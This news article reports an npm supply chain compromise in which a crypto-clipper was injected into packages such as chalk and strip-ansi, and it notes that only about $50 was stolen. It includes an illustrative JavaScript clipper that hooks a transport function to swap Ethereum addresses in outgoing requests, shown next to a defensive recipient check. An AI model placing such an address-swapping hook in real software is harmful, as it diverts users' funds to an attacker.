Massive NPM Supply Chain Hack Targets Crypto Wallets but Nets Just $50
Malicious actors are at it again, this time compromising a well-known software developer's account on the Node Package Manager (npm) registry. Investigations revealed that the hackers injected malware into popular JavaScript libraries, primarily targeting crypto wallets. Yet after launching what industry sleuths describe as the largest supply chain attack in crypto history, the hackers managed to steal only about $50 worth of crypto assets.
In brief
- Hackers compromised popular NPM packages with over 1B downloads, injecting malware that threatened major crypto wallets.
- Attackers deployed a crypto-clipper to swap wallet addresses, targeting Ethereum and Solana transactions.
- Despite vast access, hackers stole just $50 worth of ETH and memecoins before the malware was contained.
- Crypto platforms urged users to stay cautious, warning that projects that updated their dependencies after the compromised packages were published may be at risk.
Malware in NPM Packages Puts Crypto Wallets at Risk, Targets Ethereum and Solana Wallets
According to details shared by Security Alliance (SEAL) on Monday, malicious code pushed by the attackers added malware to popular JavaScript libraries with over 1 billion downloads, exposing several crypto projects to risk. The firm added that the hackers primarily targeted Ethereum and Solana wallets.
For context, the npm registry functions as a central library, or app store, where developers download and share small packages used to build JavaScript projects. Reports indicate that the hackers deployed a crypto-clipper, a type of malicious code that silently swaps wallet addresses during transactions so that funds are diverted to the attacker. A clipper running inside a web page's own JavaScript can leave the interface showing the intended address while the transaction actually submitted carries a different one, which is why the page cannot be trusted to verify itself.
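The clipper technique described above, as an added illustration that is not code from the malware, from Security Alliance, or from any wallet mentioned on this page. It models the attacker's hook around the function a web page uses to submit transactions, and the last-moment check a wallet or dApp front end can run before signing. The transport function, the addresses, and the transaction payload are all constructed placeholders:

```javascript
// Added illustration, not code from the malware or from any wallet:
// how a crypto-clipper wraps the function a web page uses to submit
// transactions so that any Ethereum address in the outgoing payload is
// silently replaced, and the pre-signing check that catches the swap.
// Addresses and the transport are constructed placeholders.

const ETH_ADDRESS_RE = /0x[0-9a-fA-F]{40}/g;

// Attacker-controlled destination (constructed placeholder, not a real wallet).
const ATTACKER_ADDRESS = "0x1111111111111111111111111111111111111111";

// Clipper core: rewrite every 20-byte hex address found in a string.
function clipAddresses(text, attackerAddress = ATTACKER_ADDRESS) {
  return text.replace(ETH_ADDRESS_RE, attackerAddress);
}

// Wrap a transport function (think of fetch or XMLHttpRequest.send) so
// request bodies are rewritten in flight. The UI still shows the address
// the user typed; only the bytes leaving the browser change.
function installClipperHook(originalSend) {
  return function hookedSend(request) {
    const body = typeof request.body === "string"
      ? clipAddresses(request.body)
      : request.body;
    return originalSend({ ...request, body });
  };
}

// Defence: compare the recipient about to be signed with the one the user
// actually confirmed, taken from form state rather than from the wire.
function verifyRecipient(txRequest, intendedRecipient) {
  const to = String(txRequest.to || "").toLowerCase();
  return to === intendedRecipient.toLowerCase();
}

// Constructed demonstration with a fake transport that records what it gets.
function demo() {
  const received = [];
  const fakeSend = (request) => {
    received.push(JSON.parse(request.body));
    return { ok: true };
  };
  const userRecipient = "0xabcdefabcdefabcdefabcdefabcdefabcdefabcd";
  const tx = { to: userRecipient, value: "0x0de0b6b3a7640000" }; // 1 ETH in wei

  const hookedSend = installClipperHook(fakeSend);
  hookedSend({
    url: "https://rpc.example.invalid",
    body: JSON.stringify({ method: "eth_sendTransaction", params: [tx] }),
  });

  const sentTx = received[0].params[0];
  return {
    sentTo: sentTx.to,
    swapped: sentTx.to !== userRecipient,
    // The check catches it because it compares against what the user confirmed.
    defenceCatchesIt: !verifyRecipient(sentTx, userRecipient),
  };
}
```

The point of `verifyRecipient` is where its second argument comes from: it must be the value the user confirmed, held outside anything the compromised library can reach, and on a hardware wallet that comparison happens on the device screen rather than in the browser at all.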
So far, the attackers have succeeded in moving only about $50 to a malicious Ethereum wallet. Security Alliance identified the wallet address, which begins with "0xFc4a48", and believes it to be the only wallet involved.
Widespread NPM Malware Breach Contained After Limited Exploit
Commenting on the breach, pseudonymous SEAL security researcher Samczsun explained that the hacker had significant access but failed to exploit it fully. He added that although the malware was widespread, it has now been largely contained.
The hacker didn’t fully capitalize on the amount of access they had. It’s like finding the keycard to Fort Knox and using it as a bookmark. The malware was widespread but at this point is nearly completely neutralized.
Samczsun
However, the figure had risen from a few cents to about $50 within hours, suggesting that further fallout from the hack may still unfold.
Security Alliance reported that five cents’ worth of Ethereum (ETH) and about $20 in memecoins were stolen. According to Etherscan data, the hacker has so far moved Brett (BRETT), Andy (ANDY), Dork Lord (DORK), Ethervista (VISTA), and Gondola (GONDOLA).
The malware was injected into packages such as chalk, strip-ansi, and color-convert, small utilities that sit deep in dependency trees and have been downloaded over 2 billion times. The security firm noted that even developers who never installed those packages directly could be at risk, since other dependencies pull them in transitively.
Crypto Platforms Urge Caution After Supply Chain Hack Raises Security Concerns
Ledger chief technology officer Charles Guillemet called for caution when confirming on-chain transactions. Crypto wallet providers Ledger and MetaMask maintained that their platforms remain safe from the breach, noting that their wallets have "multiple layers of defense" against such attacks.
Other crypto platforms, including Phantom, Uniswap, Aerodrome, and Blast, said they were unaffected by the supply chain hack. However, the pseudonymous founder of the crypto analytics platform DefiLlama, 0xngmi, noted that projects that updated their dependencies after the compromised npm packages were published may be exposed to significant risk.
He clarified that users still need to approve the malicious transaction before it can go through. Even so, DefiLlama advised users to avoid using crypto websites until the malware is fully cleaned up.
With the rapid growth of digital assets, crypto hacks have become common in recent years. Crypto platform SwissBorg recently suffered a major breach, with the hackers moving about 193,000 SOL, worth $41 million.
James Godstime is a crypto journalist and market analyst with over three years of experience in crypto, Web3, and finance. He simplifies complex and technical ideas to engage readers. Outside of work, he enjoys football and tennis, which he follows passionately.
The views, thoughts, and opinions expressed in this article belong solely to the author, and should not be taken as investment advice. Do your own research before taking any investment decisions.